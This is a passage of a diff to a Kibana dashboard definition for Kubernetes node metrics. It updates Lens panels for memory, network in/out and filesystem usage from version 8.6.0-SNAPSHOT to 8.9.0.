"average(kubernetes.node.memory.workingset.bytes)/max(kubernetes.node.memory.allocatable.bytes)", + "isFormulaBroken": false + }, + "references": [ + "b8d52304-59e9-4635-80b0-dac037233757X2" + ], + "scale": "ratio" + }, + "b8d52304-59e9-4635-80b0-dac037233757X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.workingset.bytes" + }, + "b8d52304-59e9-4635-80b0-dac037233757X1": { + "customLabel": true, + 
"dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.allocatable.bytes" + }, + "b8d52304-59e9-4635-80b0-dac037233757X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Memory Usage Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1" + ], + "location": { + "max": 94, + "min": 0 + }, + "name": "divide", + "text": "average(kubernetes.node.memory.workingset.bytes)/max(kubernetes.node.memory.allocatable.bytes)", + "type": "function" } + }, + "references": [ + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "862adc15-64b5-4dd6-a4e9-9bfc8538633d", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.node", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.node", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 
13, - "i": "b228c756-7cbd-4982-b61b-c6dbb78c1ced", - "w": 24, - "x": 0, - "y": 33 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "b228c756-7cbd-4982-b61b-c6dbb78c1ced", - "title": "Working set Memory usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "layers": [ + { + "accessors": [ + "b8d52304-59e9-4635-80b0-dac037233757" + ], + "layerId": "98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "3bc424fc-c689-46a6-a701-f2a256b700b1", + "xAccessor": "36afcbf0-7ba6-46cb-b9d7-846193cf23a8" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a21b3215-31e2-4ab3-b313-8fc7e77bed39", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "bcb17062-e9f5-4da8-a132-7bdbffe8a740": { - "columnOrder": [ - "4d608d6f-472c-433e-88a0-7794bfd9adb9", - "d38a2561-f4cd-4374-93d3-52acc2b50f7b", - "e87c113a-2feb-4cca-8093-1c4f69fc9122", - "4b5bd01c-47a8-4f48-ba67-69396e9add37" - ], - "columns": { - "4b5bd01c-47a8-4f48-ba67-69396e9add37": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.node.network.rx.bytes", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.node.network.rx.bytes" - }, - "4d608d6f-472c-433e-88a0-7794bfd9adb9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of 
kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "d38a2561-f4cd-4374-93d3-52acc2b50f7b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e87c113a-2feb-4cca-8093-1c4f69fc9122": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Network Incoming Bytes/s", - "operationType": "counter_rate", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - } - }, - "references": [ - "4b5bd01c-47a8-4f48-ba67-69396e9add37" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Working set Memory usage by Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4", + "w": 24, + "x": 24, + "y": 33 + }, + "panelIndex": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a21b3215-31e2-4ab3-b313-8fc7e77bed39", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bcb17062-e9f5-4da8-a132-7bdbffe8a740": { + "columnOrder": [ + "4d608d6f-472c-433e-88a0-7794bfd9adb9", + 
"d38a2561-f4cd-4374-93d3-52acc2b50f7b", + "e87c113a-2feb-4cca-8093-1c4f69fc9122", + "4b5bd01c-47a8-4f48-ba67-69396e9add37" + ], + "columns": { + "4b5bd01c-47a8-4f48-ba67-69396e9add37": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.node.network.rx.bytes", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.node.network.rx.bytes" + }, + "4d608d6f-472c-433e-88a0-7794bfd9adb9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "a21b3215-31e2-4ab3-b313-8fc7e77bed39", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "e87c113a-2feb-4cca-8093-1c4f69fc9122" - ], - "layerId": "bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "4d608d6f-472c-433e-88a0-7794bfd9adb9", - "xAccessor": "d38a2561-f4cd-4374-93d3-52acc2b50f7b" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - 
"preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "d38a2561-f4cd-4374-93d3-52acc2b50f7b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "e87c113a-2feb-4cca-8093-1c4f69fc9122": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Network Incoming Bytes/s", + "operationType": "counter_rate", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "references": [ + "4b5bd01c-47a8-4f48-ba67-69396e9add37" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a21b3215-31e2-4ab3-b313-8fc7e77bed39", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.node" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "e87c113a-2feb-4cca-8093-1c4f69fc9122" + ], + "layerId": "bcb17062-e9f5-4da8-a132-7bdbffe8a740", + 
"layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "4d608d6f-472c-433e-88a0-7794bfd9adb9", + "xAccessor": "d38a2561-f4cd-4374-93d3-52acc2b50f7b" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "gridData": { - "h": 13, - "i": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4", - "w": 24, - "x": 24, - "y": 33 + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4", - "title": "Network in by node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Network in by node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3", + "w": 24, + "x": 0, + "y": 46 + }, + "panelIndex": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "87c6048e-20a6-401c-bf42-72ae034ee2fa", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bcb17062-e9f5-4da8-a132-7bdbffe8a740": { + "columnOrder": [ + "4d608d6f-472c-433e-88a0-7794bfd9adb9", + "d38a2561-f4cd-4374-93d3-52acc2b50f7b", + "e87c113a-2feb-4cca-8093-1c4f69fc9122", + "4b5bd01c-47a8-4f48-ba67-69396e9add37" + ], + "columns": { + 
"4b5bd01c-47a8-4f48-ba67-69396e9add37": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.node.network.tx.bytes", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.node.network.tx.bytes" + }, + "4d608d6f-472c-433e-88a0-7794bfd9adb9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "87c6048e-20a6-401c-bf42-72ae034ee2fa", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "bcb17062-e9f5-4da8-a132-7bdbffe8a740": { - "columnOrder": [ - "4d608d6f-472c-433e-88a0-7794bfd9adb9", - "d38a2561-f4cd-4374-93d3-52acc2b50f7b", - "e87c113a-2feb-4cca-8093-1c4f69fc9122", - "4b5bd01c-47a8-4f48-ba67-69396e9add37" - ], - "columns": { - "4b5bd01c-47a8-4f48-ba67-69396e9add37": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.node.network.tx.bytes", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.node.network.tx.bytes" - }, - "4d608d6f-472c-433e-88a0-7794bfd9adb9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "d38a2561-f4cd-4374-93d3-52acc2b50f7b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - 
}, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e87c113a-2feb-4cca-8093-1c4f69fc9122": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Network Outgoing Bytes/s", - "operationType": "counter_rate", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - } - }, - "references": [ - "4b5bd01c-47a8-4f48-ba67-69396e9add37" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "87c6048e-20a6-401c-bf42-72ae034ee2fa", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "e87c113a-2feb-4cca-8093-1c4f69fc9122" - ], - "layerId": "bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "4d608d6f-472c-433e-88a0-7794bfd9adb9", - "xAccessor": "d38a2561-f4cd-4374-93d3-52acc2b50f7b" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": 
"kubernetes.node.name" + }, + "d38a2561-f4cd-4374-93d3-52acc2b50f7b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "e87c113a-2feb-4cca-8093-1c4f69fc9122": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Network Outgoing Bytes/s", + "operationType": "counter_rate", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "references": [ + "4b5bd01c-47a8-4f48-ba67-69396e9add37" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "87c6048e-20a6-401c-bf42-72ae034ee2fa", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.node" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, - "i": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3", - "w": 24, - "x": 0, - "y": 46 + "layers": [ + { + "accessors": [ + "e87c113a-2feb-4cca-8093-1c4f69fc9122" + ], + "layerId": "bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": 
"4d608d6f-472c-433e-88a0-7794bfd9adb9", + "xAccessor": "d38a2561-f4cd-4374-93d3-52acc2b50f7b" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3", - "title": "Network out by node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-98ce32f8-426f-43a8-8af5-81cf2f2e44b9", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Network out by node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5", + "w": 24, + "x": 24, + "y": 46 + }, + "panelIndex": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-98ce32f8-426f-43a8-8af5-81cf2f2e44b9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3b897101-bd76-444d-859e-60916d19dc02", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "98ce32f8-426f-43a8-8af5-81cf2f2e44b9": { + "columnOrder": [ + "2429802b-e45c-4bc0-8d4c-f66541ea3476", + "65f1d82b-207f-4397-9800-a3100415dc4d", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2" + ], + "columns": { + "2429802b-e45c-4bc0-8d4c-f66541ea3476": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of 
kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "3b897101-bd76-444d-859e-60916d19dc02", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "98ce32f8-426f-43a8-8af5-81cf2f2e44b9": { - "columnOrder": [ - "2429802b-e45c-4bc0-8d4c-f66541ea3476", - "65f1d82b-207f-4397-9800-a3100415dc4d", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2" - ], - "columns": { - "2429802b-e45c-4bc0-8d4c-f66541ea3476": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Filesystem Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.fs.used.bytes)/max(kubernetes.node.fs.capacity.bytes)", - "isFormulaBroken": false - }, - "references": [ - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2" - ], - "scale": "ratio" - }, - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Filesystem Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.fs.used.bytes" - }, - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1": { - "customLabel": 
true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Filesystem Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.fs.capacity.bytes" - }, - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Filesystem Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1" - ], - "location": { - "max": 77, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.fs.used.bytes)/max(kubernetes.node.fs.capacity.bytes)", - "type": "function" - } - }, - "references": [ - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1" - ], - "scale": "ratio" - }, - "65f1d82b-207f-4397-9800-a3100415dc4d": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "3b897101-bd76-444d-859e-60916d19dc02", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Filesystem Usage 
Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524" - ], - "layerId": "98ce32f8-426f-43a8-8af5-81cf2f2e44b9", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "2429802b-e45c-4bc0-8d4c-f66541ea3476", - "xAccessor": "65f1d82b-207f-4397-9800-a3100415dc4d" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true + "formula": "average(kubernetes.node.fs.used.bytes)/max(kubernetes.node.fs.capacity.bytes)", + "isFormulaBroken": false + }, + "references": [ + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2" + ], + "scale": "ratio" + }, + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Filesystem Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.fs.used.bytes" + }, + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Filesystem Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.fs.capacity.bytes" + }, + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Filesystem Usage 
Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1" + ], + "location": { + "max": 77, + "min": 0 + }, + "name": "divide", + "text": "average(kubernetes.node.fs.used.bytes)/max(kubernetes.node.fs.capacity.bytes)", + "type": "function" } + }, + "references": [ + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "65f1d82b-207f-4397-9800-a3100415dc4d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "3b897101-bd76-444d-859e-60916d19dc02", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.node" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, - "i": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5", - "w": 24, - "x": 24, - "y": 46 + "layers": [ + { + "accessors": [ + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524" + ], + "layerId": "98ce32f8-426f-43a8-8af5-81cf2f2e44b9", + "layerType": "data", + "position": "top", + "seriesType": 
"area", + "showGridlines": false, + "splitAccessor": "2429802b-e45c-4bc0-8d4c-f66541ea3476", + "xAccessor": "65f1d82b-207f-4397-9800-a3100415dc4d" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5", - "title": "Filesystem usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9d53c3bf-cefd-433d-a404-972717d0bb74", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Filesystem usage by Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": 